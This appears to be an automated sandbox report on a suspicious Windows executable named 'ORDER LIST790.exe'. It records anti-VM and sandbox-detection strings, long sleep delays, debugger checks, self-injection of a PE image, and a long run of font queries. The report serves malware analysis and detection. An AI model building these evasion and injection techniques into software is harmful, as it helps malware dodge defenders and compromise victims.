Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 5492	Thread sleep time: -45877s >= -30000s
Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 5512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 3744	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Thread delayed: delay time: 45877
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Thread delayed: delay time: 60000

Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Process queried: DebugPort

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Memory written: C:\Users\user\Desktop\ORDER LIST790.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Process created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Users\user\Desktop\ORDER LIST790.exe VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
